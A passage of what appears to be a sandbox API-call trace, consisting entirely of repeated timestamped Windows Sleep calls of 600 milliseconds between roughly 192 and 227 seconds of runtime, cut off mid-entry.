[0192.532] Sleep (dwMilliseconds=0x258) [0192.655] Sleep (dwMilliseconds=0x258) [0192.747] Sleep (dwMilliseconds=0x258) [0192.856] Sleep (dwMilliseconds=0x258) [0192.978] Sleep (dwMilliseconds=0x258) [0193.496] Sleep (dwMilliseconds=0x258) [0193.550] Sleep (dwMilliseconds=0x258) [0193.745] Sleep (dwMilliseconds=0x258) [0193.870] Sleep (dwMilliseconds=0x258) [0193.979] Sleep (dwMilliseconds=0x258) [0194.010] Sleep (dwMilliseconds=0x258) [0194.057] Sleep (dwMilliseconds=0x258) [0194.078] Sleep (dwMilliseconds=0x258) [0194.093] Sleep (dwMilliseconds=0x258) [0194.152] Sleep (dwMilliseconds=0x258) [0194.175] Sleep (dwMilliseconds=0x258) [0194.229] Sleep (dwMilliseconds=0x258) [0194.249] Sleep (dwMilliseconds=0x258) [0194.262] Sleep (dwMilliseconds=0x258) [0194.323] Sleep (dwMilliseconds=0x258) [0194.348] Sleep (dwMilliseconds=0x258) [0194.401] Sleep (dwMilliseconds=0x258) [0194.426] Sleep (dwMilliseconds=0x258) [0194.432] Sleep (dwMilliseconds=0x258) [0194.494] Sleep (dwMilliseconds=0x258) [0194.522] Sleep (dwMilliseconds=0x258) [0194.572] Sleep (dwMilliseconds=0x258) [0194.600] Sleep (dwMilliseconds=0x258) [0194.604] Sleep (dwMilliseconds=0x258) [0194.666] Sleep (dwMilliseconds=0x258) [0194.709] Sleep (dwMilliseconds=0x258) [0194.760] Sleep (dwMilliseconds=0x258) [0194.782] Sleep (dwMilliseconds=0x258) [0194.791] Sleep (dwMilliseconds=0x258) [0194.853] Sleep (dwMilliseconds=0x258) [0194.869] Sleep (dwMilliseconds=0x258) [0194.924] Sleep (dwMilliseconds=0x258) [0194.945] Sleep (dwMilliseconds=0x258) [0194.958] Sleep (dwMilliseconds=0x258) [0195.009] Sleep (dwMilliseconds=0x258) [0195.027] Sleep (dwMilliseconds=0x258) [0195.088] Sleep (dwMilliseconds=0x258) [0195.121] Sleep (dwMilliseconds=0x258) [0195.180] Sleep (dwMilliseconds=0x258) [0195.208] Sleep (dwMilliseconds=0x258) [0195.212] Sleep (dwMilliseconds=0x258) [0195.277] Sleep (dwMilliseconds=0x258) [0195.296] Sleep (dwMilliseconds=0x258) [0195.352] Sleep (dwMilliseconds=0x258) [0195.379] Sleep (dwMilliseconds=0x258) [0195.383] Sleep (dwMilliseconds=0x258) [0195.431] Sleep (dwMilliseconds=0x258) [0195.467] Sleep (dwMilliseconds=0x258) [0195.524] Sleep (dwMilliseconds=0x258) [0195.545] Sleep (dwMilliseconds=0x258) [0195.555] Sleep (dwMilliseconds=0x258) [0195.617] Sleep (dwMilliseconds=0x258) [0195.642] Sleep (dwMilliseconds=0x258) [0195.696] Sleep (dwMilliseconds=0x258) [0195.720] Sleep (dwMilliseconds=0x258) [0195.727] Sleep (dwMilliseconds=0x258) [0195.780] Sleep (dwMilliseconds=0x258) [0195.822] Sleep (dwMilliseconds=0x258) [0195.867] Sleep (dwMilliseconds=0x258) [0195.897] Sleep (dwMilliseconds=0x258) [0195.898] Sleep (dwMilliseconds=0x258) [0195.924] Sleep (dwMilliseconds=0x258) [0195.991] Sleep (dwMilliseconds=0x258) [0196.039] Sleep (dwMilliseconds=0x258) [0196.069] Sleep (dwMilliseconds=0x258) [0196.069] Sleep (dwMilliseconds=0x258) [0196.085] Sleep (dwMilliseconds=0x258) [0196.101] Sleep (dwMilliseconds=0x258) [0196.117] Sleep (dwMilliseconds=0x258) [0196.148] Sleep (dwMilliseconds=0x258) [0196.212] Sleep (dwMilliseconds=0x258) [0196.257] Sleep (dwMilliseconds=0x258) [0196.299] Sleep (dwMilliseconds=0x258) [0196.303] Sleep (dwMilliseconds=0x258) [0196.320] Sleep (dwMilliseconds=0x258) [0196.336] Sleep (dwMilliseconds=0x258) [0196.350] Sleep (dwMilliseconds=0x258) [0196.366] Sleep (dwMilliseconds=0x258) [0196.428] Sleep (dwMilliseconds=0x258) [0196.478] Sleep (dwMilliseconds=0x258) [0196.519] Sleep (dwMilliseconds=0x258) [0196.524] Sleep (dwMilliseconds=0x258) [0196.539] Sleep (dwMilliseconds=0x258) [0196.553] Sleep (dwMilliseconds=0x258) [0196.569] Sleep (dwMilliseconds=0x258) [0196.584] Sleep (dwMilliseconds=0x258) [0196.647] Sleep (dwMilliseconds=0x258) [0196.695] Sleep (dwMilliseconds=0x258) [0196.737] Sleep (dwMilliseconds=0x258) [0196.740] Sleep (dwMilliseconds=0x258) [0196.758] Sleep (dwMilliseconds=0x258) [0196.772] Sleep (dwMilliseconds=0x258) [0196.787] Sleep (dwMilliseconds=0x258) [0196.804] Sleep (dwMilliseconds=0x258) [0196.866] Sleep (dwMilliseconds=0x258) [0196.925] Sleep (dwMilliseconds=0x258) [0196.982] Sleep (dwMilliseconds=0x258) [0196.990] Sleep (dwMilliseconds=0x258) [0197.026] Sleep (dwMilliseconds=0x258) [0197.039] Sleep (dwMilliseconds=0x258) [0197.053] Sleep (dwMilliseconds=0x258) [0197.115] Sleep (dwMilliseconds=0x258) [0197.171] Sleep (dwMilliseconds=0x258) [0197.235] Sleep (dwMilliseconds=0x258) [0197.244] Sleep (dwMilliseconds=0x258) [0197.255] Sleep (dwMilliseconds=0x258) [0197.272] Sleep (dwMilliseconds=0x258) [0197.286] Sleep (dwMilliseconds=0x258) [0197.349] Sleep (dwMilliseconds=0x258) [0197.395] Sleep (dwMilliseconds=0x258) [0197.417] Sleep (dwMilliseconds=0x258) [0197.427] Sleep (dwMilliseconds=0x258) [0197.443] Sleep (dwMilliseconds=0x258) [0197.459] Sleep (dwMilliseconds=0x258) [0197.474] Sleep (dwMilliseconds=0x258) [0197.489] Sleep (dwMilliseconds=0x258) [0197.567] Sleep (dwMilliseconds=0x258) [0197.614] Sleep (dwMilliseconds=0x258) [0197.658] Sleep (dwMilliseconds=0x258) [0197.661] Sleep (dwMilliseconds=0x258) [0197.676] Sleep (dwMilliseconds=0x258) [0197.692] Sleep (dwMilliseconds=0x258) [0197.708] Sleep (dwMilliseconds=0x258) [0197.724] Sleep (dwMilliseconds=0x258) [0197.786] Sleep (dwMilliseconds=0x258) [0197.848] Sleep (dwMilliseconds=0x258) [0197.865] Sleep (dwMilliseconds=0x258) [0197.879] Sleep (dwMilliseconds=0x258) [0197.896] Sleep (dwMilliseconds=0x258) [0197.911] Sleep (dwMilliseconds=0x258) [0197.926] Sleep (dwMilliseconds=0x258) [0197.956] Sleep (dwMilliseconds=0x258) [0198.005] Sleep (dwMilliseconds=0x258) [0198.065] Sleep (dwMilliseconds=0x258) [0198.083] Sleep (dwMilliseconds=0x258) [0198.105] Sleep (dwMilliseconds=0x258) [0198.114] Sleep (dwMilliseconds=0x258) [0198.136] Sleep (dwMilliseconds=0x258) [0198.157] Sleep (dwMilliseconds=0x258) [0198.208] Sleep (dwMilliseconds=0x258) [0198.270] Sleep (dwMilliseconds=0x258) [0198.330] Sleep (dwMilliseconds=0x258) [0198.331] Sleep (dwMilliseconds=0x258) [0198.347] Sleep (dwMilliseconds=0x258) [0198.363] Sleep (dwMilliseconds=0x258) [0198.379] Sleep (dwMilliseconds=0x258) [0198.427] Sleep (dwMilliseconds=0x258) [0198.472] Sleep (dwMilliseconds=0x258) [0198.527] Sleep (dwMilliseconds=0x258) [0198.561] Sleep (dwMilliseconds=0x258) [0198.566] Sleep (dwMilliseconds=0x258) [0198.584] Sleep (dwMilliseconds=0x258) [0198.610] Sleep (dwMilliseconds=0x258) [0198.614] Sleep (dwMilliseconds=0x258) [0198.690] Sleep (dwMilliseconds=0x258) [0198.738] Sleep (dwMilliseconds=0x258) [0198.757] Sleep (dwMilliseconds=0x258) [0198.768] Sleep (dwMilliseconds=0x258) [0198.784] Sleep (dwMilliseconds=0x258) [0198.800] Sleep (dwMilliseconds=0x258) [0198.815] Sleep (dwMilliseconds=0x258) [0198.831] Sleep (dwMilliseconds=0x258) [0198.893] Sleep (dwMilliseconds=0x258) [0198.940] Sleep (dwMilliseconds=0x258) [0198.978] Sleep (dwMilliseconds=0x258) [0198.987] Sleep (dwMilliseconds=0x258) [0199.008] Sleep (dwMilliseconds=0x258) [0199.024] Sleep (dwMilliseconds=0x258) [0199.034] Sleep (dwMilliseconds=0x258) [0199.091] Sleep (dwMilliseconds=0x258) [0199.127] Sleep (dwMilliseconds=0x258) [0199.204] Sleep (dwMilliseconds=0x258) [0199.205] Sleep (dwMilliseconds=0x258) [0199.221] Sleep (dwMilliseconds=0x258) [0199.236] Sleep (dwMilliseconds=0x258) [0199.252] Sleep (dwMilliseconds=0x258) [0199.305] Sleep (dwMilliseconds=0x258) [0199.346] Sleep (dwMilliseconds=0x258) [0199.391] Sleep (dwMilliseconds=0x258) [0199.392] Sleep (dwMilliseconds=0x258) [0199.409] Sleep (dwMilliseconds=0x258) [0199.424] Sleep (dwMilliseconds=0x258) [0199.441] Sleep (dwMilliseconds=0x258) [0199.460] Sleep (dwMilliseconds=0x258) [0199.549] Sleep (dwMilliseconds=0x258) [0199.632] Sleep (dwMilliseconds=0x258) [0199.701] Sleep (dwMilliseconds=0x258) [0199.708] Sleep (dwMilliseconds=0x258) [0199.722] Sleep (dwMilliseconds=0x258) [0199.799] Sleep (dwMilliseconds=0x258) [0199.853] Sleep (dwMilliseconds=0x258) [0199.896] Sleep (dwMilliseconds=0x258) [0199.908] Sleep (dwMilliseconds=0x258) [0199.923] Sleep (dwMilliseconds=0x258) [0200.064] Sleep (dwMilliseconds=0x258) [0200.115] Sleep (dwMilliseconds=0x258) [0200.177] Sleep (dwMilliseconds=0x258) [0200.241] Sleep (dwMilliseconds=0x258) [0200.286] Sleep (dwMilliseconds=0x258) [0200.322] Sleep (dwMilliseconds=0x258) [0200.439] Sleep (dwMilliseconds=0x258) [0200.532] Sleep (dwMilliseconds=0x258) [0200.661] Sleep (dwMilliseconds=0x258) [0200.687] Sleep (dwMilliseconds=0x258) [0200.690] Sleep (dwMilliseconds=0x258) [0200.765] Sleep (dwMilliseconds=0x258) [0200.819] Sleep (dwMilliseconds=0x258) [0200.861] Sleep (dwMilliseconds=0x258) [0201.191] Sleep (dwMilliseconds=0x258) [0201.234] Sleep (dwMilliseconds=0x258) [0201.281] Sleep (dwMilliseconds=0x258) [0201.331] Sleep (dwMilliseconds=0x258) [0201.784] Sleep (dwMilliseconds=0x258) [0202.109] Sleep (dwMilliseconds=0x258) [0202.156] Sleep (dwMilliseconds=0x258) [0202.211] Sleep (dwMilliseconds=0x258) [0202.239] Sleep (dwMilliseconds=0x258) [0202.258] Sleep (dwMilliseconds=0x258) [0202.266] Sleep (dwMilliseconds=0x258) [0202.289] Sleep (dwMilliseconds=0x258) [0202.306] Sleep (dwMilliseconds=0x258) [0202.345] Sleep (dwMilliseconds=0x258) [0202.703] Sleep (dwMilliseconds=0x258) [0202.748] Sleep (dwMilliseconds=0x258) [0202.794] Sleep (dwMilliseconds=0x258) [0202.826] Sleep (dwMilliseconds=0x258) [0203.305] Sleep (dwMilliseconds=0x258) [0203.310] Sleep (dwMilliseconds=0x258) [0203.371] Sleep (dwMilliseconds=0x258) [0203.419] Sleep (dwMilliseconds=0x258) [0203.516] Sleep (dwMilliseconds=0x258) [0203.961] Sleep (dwMilliseconds=0x258) [0204.010] Sleep (dwMilliseconds=0x258) [0204.150] Sleep (dwMilliseconds=0x258) [0204.229] Sleep (dwMilliseconds=0x258) [0204.308] Sleep (dwMilliseconds=0x258) [0204.403] Sleep (dwMilliseconds=0x258) [0204.496] Sleep (dwMilliseconds=0x258) [0204.524] Sleep (dwMilliseconds=0x258) [0204.571] Sleep (dwMilliseconds=0x258) [0204.614] Sleep (dwMilliseconds=0x258) [0204.681] Sleep (dwMilliseconds=0x258) [0204.866] Sleep (dwMilliseconds=0x258) [0204.900] Sleep (dwMilliseconds=0x258) [0204.931] Sleep (dwMilliseconds=0x258) [0204.951] Sleep (dwMilliseconds=0x258) [0205.056] Sleep (dwMilliseconds=0x258) [0205.429] Sleep (dwMilliseconds=0x258) [0205.482] Sleep (dwMilliseconds=0x258) [0205.506] Sleep (dwMilliseconds=0x258) [0205.666] Sleep (dwMilliseconds=0x258) [0205.691] Sleep (dwMilliseconds=0x258) [0205.757] Sleep (dwMilliseconds=0x258) [0205.835] Sleep (dwMilliseconds=0x258) [0205.885] Sleep (dwMilliseconds=0x258) [0207.147] Sleep (dwMilliseconds=0x258) [0207.169] Sleep (dwMilliseconds=0x258) [0207.224] Sleep (dwMilliseconds=0x258) [0207.443] Sleep (dwMilliseconds=0x258) [0207.479] Sleep (dwMilliseconds=0x258) [0207.500] Sleep (dwMilliseconds=0x258) [0207.949] Sleep (dwMilliseconds=0x258) [0207.990] Sleep (dwMilliseconds=0x258) [0208.082] Sleep (dwMilliseconds=0x258) [0208.129] Sleep (dwMilliseconds=0x258) [0208.187] Sleep (dwMilliseconds=0x258) [0208.198] Sleep (dwMilliseconds=0x258) [0208.671] Sleep (dwMilliseconds=0x258) [0208.726] Sleep (dwMilliseconds=0x258) [0208.802] Sleep (dwMilliseconds=0x258) [0208.846] Sleep (dwMilliseconds=0x258) [0208.888] Sleep (dwMilliseconds=0x258) [0208.911] Sleep (dwMilliseconds=0x258) [0209.127] Sleep (dwMilliseconds=0x258) [0209.153] Sleep (dwMilliseconds=0x258) [0209.175] Sleep (dwMilliseconds=0x258) [0209.283] Sleep (dwMilliseconds=0x258) [0209.377] Sleep (dwMilliseconds=0x258) [0209.471] Sleep (dwMilliseconds=0x258) [0209.519] Sleep (dwMilliseconds=0x258) [0209.601] Sleep (dwMilliseconds=0x258) [0209.689] Sleep (dwMilliseconds=0x258) [0209.782] Sleep (dwMilliseconds=0x258) [0209.819] Sleep (dwMilliseconds=0x258) [0209.892] Sleep (dwMilliseconds=0x258) [0210.032] Sleep (dwMilliseconds=0x258) [0210.095] Sleep (dwMilliseconds=0x258) [0210.188] Sleep (dwMilliseconds=0x258) [0210.313] Sleep (dwMilliseconds=0x258) [0210.423] Sleep (dwMilliseconds=0x258) [0210.532] Sleep (dwMilliseconds=0x258) [0210.642] Sleep (dwMilliseconds=0x258) [0210.713] Sleep (dwMilliseconds=0x258) [0210.796] Sleep (dwMilliseconds=0x258) [0210.893] Sleep (dwMilliseconds=0x258) [0210.973] Sleep (dwMilliseconds=0x258) [0211.047] Sleep (dwMilliseconds=0x258) [0211.124] Sleep (dwMilliseconds=0x258) [0211.233] Sleep (dwMilliseconds=0x258) [0211.281] Sleep (dwMilliseconds=0x258) [0211.361] Sleep (dwMilliseconds=0x258) [0211.487] Sleep (dwMilliseconds=0x258) [0211.532] Sleep (dwMilliseconds=0x258) [0211.565] Sleep (dwMilliseconds=0x258) [0211.640] Sleep (dwMilliseconds=0x258) [0211.780] Sleep (dwMilliseconds=0x258) [0211.825] Sleep (dwMilliseconds=0x258) [0211.920] Sleep (dwMilliseconds=0x258) [0212.028] Sleep (dwMilliseconds=0x258) [0212.129] Sleep (dwMilliseconds=0x258) [0212.189] Sleep (dwMilliseconds=0x258) [0212.264] Sleep (dwMilliseconds=0x258) [0212.336] Sleep (dwMilliseconds=0x258) [0212.409] Sleep (dwMilliseconds=0x258) [0212.509] Sleep (dwMilliseconds=0x258) [0212.567] Sleep (dwMilliseconds=0x258) [0212.638] Sleep (dwMilliseconds=0x258) [0212.731] Sleep (dwMilliseconds=0x258) [0212.794] Sleep (dwMilliseconds=0x258) [0212.861] Sleep (dwMilliseconds=0x258) [0213.045] Sleep (dwMilliseconds=0x258) [0213.109] Sleep (dwMilliseconds=0x258) [0213.144] Sleep (dwMilliseconds=0x258) [0213.152] Sleep (dwMilliseconds=0x258) [0213.202] Sleep (dwMilliseconds=0x258) [0213.231] Sleep (dwMilliseconds=0x258) [0213.281] Sleep (dwMilliseconds=0x258) [0213.302] Sleep (dwMilliseconds=0x258) [0213.309] Sleep (dwMilliseconds=0x258) [0213.324] Sleep (dwMilliseconds=0x258) [0213.378] Sleep (dwMilliseconds=0x258) [0213.397] Sleep (dwMilliseconds=0x258) [0213.434] Sleep (dwMilliseconds=0x258) [0213.462] Sleep (dwMilliseconds=0x258) [0213.463] Sleep (dwMilliseconds=0x258) [0213.481] Sleep (dwMilliseconds=0x258) [0213.528] Sleep (dwMilliseconds=0x258) [0213.555] Sleep (dwMilliseconds=0x258) [0213.592] Sleep (dwMilliseconds=0x258) [0213.617] Sleep (dwMilliseconds=0x258) [0213.620] Sleep (dwMilliseconds=0x258) [0213.635] Sleep (dwMilliseconds=0x258) [0213.691] Sleep (dwMilliseconds=0x258) [0213.715] Sleep (dwMilliseconds=0x258) [0213.759] Sleep (dwMilliseconds=0x258) [0213.782] Sleep (dwMilliseconds=0x258) [0213.792] Sleep (dwMilliseconds=0x258) [0213.842] Sleep (dwMilliseconds=0x258) [0213.875] Sleep (dwMilliseconds=0x258) [0213.920] Sleep (dwMilliseconds=0x258) [0213.954] Sleep (dwMilliseconds=0x258) [0213.978] Sleep (dwMilliseconds=0x258) [0214.016] Sleep (dwMilliseconds=0x258) [0214.037] Sleep (dwMilliseconds=0x258) [0214.045] Sleep (dwMilliseconds=0x258) [0214.105] Sleep (dwMilliseconds=0x258) [0214.122] Sleep (dwMilliseconds=0x258) [0214.181] Sleep (dwMilliseconds=0x258) [0214.226] Sleep (dwMilliseconds=0x258) [0214.307] Sleep (dwMilliseconds=0x258) [0214.416] Sleep (dwMilliseconds=0x258) [0214.493] Sleep (dwMilliseconds=0x258) [0214.546] Sleep (dwMilliseconds=0x258) [0214.589] Sleep (dwMilliseconds=0x258) [0214.644] Sleep (dwMilliseconds=0x258) [0214.688] Sleep (dwMilliseconds=0x258) [0214.712] Sleep (dwMilliseconds=0x258) [0214.791] Sleep (dwMilliseconds=0x258) [0214.837] Sleep (dwMilliseconds=0x258) [0214.887] Sleep (dwMilliseconds=0x258) [0214.924] Sleep (dwMilliseconds=0x258) [0214.978] Sleep (dwMilliseconds=0x258) [0215.068] Sleep (dwMilliseconds=0x258) [0215.118] Sleep (dwMilliseconds=0x258) [0215.221] Sleep (dwMilliseconds=0x258) [0215.246] Sleep (dwMilliseconds=0x258) [0215.258] Sleep (dwMilliseconds=0x258) [0215.303] Sleep (dwMilliseconds=0x258) [0215.398] Sleep (dwMilliseconds=0x258) [0215.465] Sleep (dwMilliseconds=0x258) [0215.611] Sleep (dwMilliseconds=0x258) [0215.694] Sleep (dwMilliseconds=0x258) [0215.772] Sleep (dwMilliseconds=0x258) [0215.799] Sleep (dwMilliseconds=0x258) [0215.867] Sleep (dwMilliseconds=0x258) [0215.917] Sleep (dwMilliseconds=0x258) [0215.980] Sleep (dwMilliseconds=0x258) [0216.037] Sleep (dwMilliseconds=0x258) [0216.083] Sleep (dwMilliseconds=0x258) [0216.085] Sleep (dwMilliseconds=0x258) [0216.147] Sleep (dwMilliseconds=0x258) [0216.208] Sleep (dwMilliseconds=0x258) [0216.262] Sleep (dwMilliseconds=0x258) [0216.272] Sleep (dwMilliseconds=0x258) [0216.288] Sleep (dwMilliseconds=0x258) [0216.329] Sleep (dwMilliseconds=0x258) [0216.398] Sleep (dwMilliseconds=0x258) [0216.476] Sleep (dwMilliseconds=0x258) [0216.581] Sleep (dwMilliseconds=0x258) [0216.614] Sleep (dwMilliseconds=0x258) [0216.615] Sleep (dwMilliseconds=0x258) [0216.635] Sleep (dwMilliseconds=0x258) [0216.646] Sleep (dwMilliseconds=0x258) [0216.709] Sleep (dwMilliseconds=0x258) [0216.803] Sleep (dwMilliseconds=0x258) [0216.911] Sleep (dwMilliseconds=0x258) [0216.975] Sleep (dwMilliseconds=0x258) [0217.068] Sleep (dwMilliseconds=0x258) [0217.162] Sleep (dwMilliseconds=0x258) [0217.225] Sleep (dwMilliseconds=0x258) [0217.271] Sleep (dwMilliseconds=0x258) [0217.375] Sleep (dwMilliseconds=0x258) [0217.465] Sleep (dwMilliseconds=0x258) [0217.497] Sleep (dwMilliseconds=0x258) [0217.568] Sleep (dwMilliseconds=0x258) [0217.629] Sleep (dwMilliseconds=0x258) [0217.679] Sleep (dwMilliseconds=0x258) [0217.722] Sleep (dwMilliseconds=0x258) [0217.725] Sleep (dwMilliseconds=0x258) [0217.738] Sleep (dwMilliseconds=0x258) [0217.755] Sleep (dwMilliseconds=0x258) [0217.778] Sleep (dwMilliseconds=0x258) [0217.785] Sleep (dwMilliseconds=0x258) [0217.847] Sleep (dwMilliseconds=0x258) [0217.901] Sleep (dwMilliseconds=0x258) [0217.954] Sleep (dwMilliseconds=0x258) [0217.974] Sleep (dwMilliseconds=0x258) [0217.988] Sleep (dwMilliseconds=0x258) [0218.004] Sleep (dwMilliseconds=0x258) [0218.021] Sleep (dwMilliseconds=0x258) [0218.066] Sleep (dwMilliseconds=0x258) [0218.114] Sleep (dwMilliseconds=0x258) [0218.148] Sleep (dwMilliseconds=0x258) [0218.160] Sleep (dwMilliseconds=0x258) [0218.181] Sleep (dwMilliseconds=0x258) [0218.190] Sleep (dwMilliseconds=0x258) [0218.206] Sleep (dwMilliseconds=0x258) [0218.223] Sleep (dwMilliseconds=0x258) [0218.270] Sleep (dwMilliseconds=0x258) [0218.316] Sleep (dwMilliseconds=0x258) [0218.350] Sleep (dwMilliseconds=0x258) [0218.363] Sleep (dwMilliseconds=0x258) [0218.399] Sleep (dwMilliseconds=0x258) [0218.409] Sleep (dwMilliseconds=0x258) [0218.429] Sleep (dwMilliseconds=0x258) [0218.487] Sleep (dwMilliseconds=0x258) [0218.536] Sleep (dwMilliseconds=0x258) [0218.582] Sleep (dwMilliseconds=0x258) [0218.596] Sleep (dwMilliseconds=0x258) [0218.612] Sleep (dwMilliseconds=0x258) [0218.628] Sleep (dwMilliseconds=0x258) [0218.643] Sleep (dwMilliseconds=0x258) [0218.705] Sleep (dwMilliseconds=0x258) [0218.755] Sleep (dwMilliseconds=0x258) [0218.810] Sleep (dwMilliseconds=0x258) [0218.815] Sleep (dwMilliseconds=0x258) [0218.830] Sleep (dwMilliseconds=0x258) [0218.849] Sleep (dwMilliseconds=0x258) [0218.861] Sleep (dwMilliseconds=0x258) [0218.924] Sleep (dwMilliseconds=0x258) [0218.984] Sleep (dwMilliseconds=0x258) [0219.029] Sleep (dwMilliseconds=0x258) [0219.033] Sleep (dwMilliseconds=0x258) [0219.049] Sleep (dwMilliseconds=0x258) [0219.065] Sleep (dwMilliseconds=0x258) [0219.080] Sleep (dwMilliseconds=0x258) [0219.095] Sleep (dwMilliseconds=0x258) [0219.158] Sleep (dwMilliseconds=0x258) [0219.205] Sleep (dwMilliseconds=0x258) [0219.252] Sleep (dwMilliseconds=0x258) [0219.267] Sleep (dwMilliseconds=0x258) [0219.284] Sleep (dwMilliseconds=0x258) [0219.299] Sleep (dwMilliseconds=0x258) [0219.314] Sleep (dwMilliseconds=0x258) [0219.363] Sleep (dwMilliseconds=0x258) [0219.417] Sleep (dwMilliseconds=0x258) [0219.459] Sleep (dwMilliseconds=0x258) [0219.476] Sleep (dwMilliseconds=0x258) [0219.485] Sleep (dwMilliseconds=0x258) [0219.501] Sleep (dwMilliseconds=0x258) [0219.517] Sleep (dwMilliseconds=0x258) [0219.533] Sleep (dwMilliseconds=0x258) [0219.594] Sleep (dwMilliseconds=0x258) [0219.659] Sleep (dwMilliseconds=0x258) [0219.673] Sleep (dwMilliseconds=0x258) [0219.688] Sleep (dwMilliseconds=0x258) [0219.703] Sleep (dwMilliseconds=0x258) [0219.719] Sleep (dwMilliseconds=0x258) [0219.735] Sleep (dwMilliseconds=0x258) [0219.799] Sleep (dwMilliseconds=0x258) [0219.845] Sleep (dwMilliseconds=0x258) [0219.911] Sleep (dwMilliseconds=0x258) [0219.922] Sleep (dwMilliseconds=0x258) [0219.938] Sleep (dwMilliseconds=0x258) [0219.954] Sleep (dwMilliseconds=0x258) [0219.981] Sleep (dwMilliseconds=0x258) [0220.032] Sleep (dwMilliseconds=0x258) [0220.080] Sleep (dwMilliseconds=0x258) [0220.117] Sleep (dwMilliseconds=0x258) [0220.126] Sleep (dwMilliseconds=0x258) [0220.141] Sleep (dwMilliseconds=0x258) [0220.156] Sleep (dwMilliseconds=0x258) [0220.172] Sleep (dwMilliseconds=0x258) [0220.187] Sleep (dwMilliseconds=0x258) [0220.251] Sleep (dwMilliseconds=0x258) [0220.297] Sleep (dwMilliseconds=0x258) [0220.326] Sleep (dwMilliseconds=0x258) [0220.327] Sleep (dwMilliseconds=0x258) [0220.351] Sleep (dwMilliseconds=0x258) [0220.365] Sleep (dwMilliseconds=0x258) [0220.380] Sleep (dwMilliseconds=0x258) [0220.390] Sleep (dwMilliseconds=0x258) [0220.453] Sleep (dwMilliseconds=0x258) [0220.499] Sleep (dwMilliseconds=0x258) [0220.526] Sleep (dwMilliseconds=0x258) [0220.532] Sleep (dwMilliseconds=0x258) [0220.547] Sleep (dwMilliseconds=0x258) [0220.562] Sleep (dwMilliseconds=0x258) [0220.577] Sleep (dwMilliseconds=0x258) [0220.593] Sleep (dwMilliseconds=0x258) [0220.656] Sleep (dwMilliseconds=0x258) [0220.702] Sleep (dwMilliseconds=0x258) [0220.740] Sleep (dwMilliseconds=0x258) [0220.749] Sleep (dwMilliseconds=0x258) [0220.766] Sleep (dwMilliseconds=0x258) [0220.781] Sleep (dwMilliseconds=0x258) [0220.796] Sleep (dwMilliseconds=0x258) [0220.859] Sleep (dwMilliseconds=0x258) [0220.941] Sleep (dwMilliseconds=0x258) [0220.992] Sleep (dwMilliseconds=0x258) [0221.000] Sleep (dwMilliseconds=0x258) [0221.014] Sleep (dwMilliseconds=0x258) [0221.031] Sleep (dwMilliseconds=0x258) [0221.048] Sleep (dwMilliseconds=0x258) [0221.109] Sleep (dwMilliseconds=0x258) [0221.158] Sleep (dwMilliseconds=0x258) [0221.215] Sleep (dwMilliseconds=0x258) [0221.223] Sleep (dwMilliseconds=0x258) [0221.241] Sleep (dwMilliseconds=0x258) [0221.343] Sleep (dwMilliseconds=0x258) [0221.415] Sleep (dwMilliseconds=0x258) [0221.470] Sleep (dwMilliseconds=0x258) [0221.535] Sleep (dwMilliseconds=0x258) [0221.561] Sleep (dwMilliseconds=0x258) [0221.576] Sleep (dwMilliseconds=0x258) [0221.639] Sleep (dwMilliseconds=0x258) [0221.700] Sleep (dwMilliseconds=0x258) [0221.780] Sleep (dwMilliseconds=0x258) [0221.829] Sleep (dwMilliseconds=0x258) [0221.951] Sleep (dwMilliseconds=0x258) [0222.044] Sleep (dwMilliseconds=0x258) [0222.153] Sleep (dwMilliseconds=0x258) [0222.246] Sleep (dwMilliseconds=0x258) [0222.590] Sleep (dwMilliseconds=0x258) [0222.707] Sleep (dwMilliseconds=0x258) [0222.755] Sleep (dwMilliseconds=0x258) [0222.773] Sleep (dwMilliseconds=0x258) [0222.780] Sleep (dwMilliseconds=0x258) [0222.806] Sleep (dwMilliseconds=0x258) [0222.860] Sleep (dwMilliseconds=0x258) [0222.948] Sleep (dwMilliseconds=0x258) [0223.030] Sleep (dwMilliseconds=0x258) [0223.120] Sleep (dwMilliseconds=0x258) [0223.214] Sleep (dwMilliseconds=0x258) [0223.292] Sleep (dwMilliseconds=0x258) [0223.338] Sleep (dwMilliseconds=0x258) [0223.418] Sleep (dwMilliseconds=0x258) [0223.495] Sleep (dwMilliseconds=0x258) [0223.573] Sleep (dwMilliseconds=0x258) [0223.615] Sleep (dwMilliseconds=0x258) [0223.666] Sleep (dwMilliseconds=0x258) [0223.791] Sleep (dwMilliseconds=0x258) [0223.896] Sleep (dwMilliseconds=0x258) [0223.940] Sleep (dwMilliseconds=0x258) [0223.979] Sleep (dwMilliseconds=0x258) [0224.073] Sleep (dwMilliseconds=0x258) [0224.187] Sleep (dwMilliseconds=0x258) [0224.261] Sleep (dwMilliseconds=0x258) [0224.306] Sleep (dwMilliseconds=0x258) [0224.387] Sleep (dwMilliseconds=0x258) [0224.447] Sleep (dwMilliseconds=0x258) [0224.566] Sleep (dwMilliseconds=0x258) [0224.703] Sleep (dwMilliseconds=0x258) [0224.797] Sleep (dwMilliseconds=0x258) [0224.910] Sleep (dwMilliseconds=0x258) [0224.983] Sleep (dwMilliseconds=0x258) [0225.075] Sleep (dwMilliseconds=0x258) [0225.201] Sleep (dwMilliseconds=0x258) [0225.273] Sleep (dwMilliseconds=0x258) [0225.301] Sleep (dwMilliseconds=0x258) [0225.351] Sleep (dwMilliseconds=0x258) [0225.450] Sleep (dwMilliseconds=0x258) [0225.547] Sleep (dwMilliseconds=0x258) [0225.579] Sleep (dwMilliseconds=0x258) [0225.609] Sleep (dwMilliseconds=0x258) [0225.646] Sleep (dwMilliseconds=0x258) [0225.653] Sleep (dwMilliseconds=0x258) [0225.725] Sleep (dwMilliseconds=0x258) [0225.850] Sleep (dwMilliseconds=0x258) [0225.903] Sleep (dwMilliseconds=0x258) [0225.918] Sleep (dwMilliseconds=0x258) [0225.938] Sleep (dwMilliseconds=0x258) [0225.946] Sleep (dwMilliseconds=0x258) [0225.974] Sleep (dwMilliseconds=0x258) [0226.022] Sleep (dwMilliseconds=0x258) [0226.070] Sleep (dwMilliseconds=0x258) [0226.109] Sleep (dwMilliseconds=0x258) [0226.115] Sleep (dwMilliseconds=0x258) [0226.209] Sleep (dwMilliseconds=0x258) [0226.266] Sleep (dwMilliseconds=0x258) [0226.305] Sleep (dwMilliseconds=0x258) [0226.381] Sleep (dwMilliseconds=0x258) [0226.457] Sleep (dwMilliseconds=0x258) [0226.523] Sleep (dwMilliseconds=0x258) [0226.599] Sleep (dwMilliseconds=0x258) [0226.635] Sleep (dwMilliseconds=0x258) [0226.677] Sleep (dwMilliseconds=0x258) [0226.724] Sleep (dwMilliseconds=0x258) [0226.770] Sleep (dwMilliseconds=0x258) [0226.817] Sleep 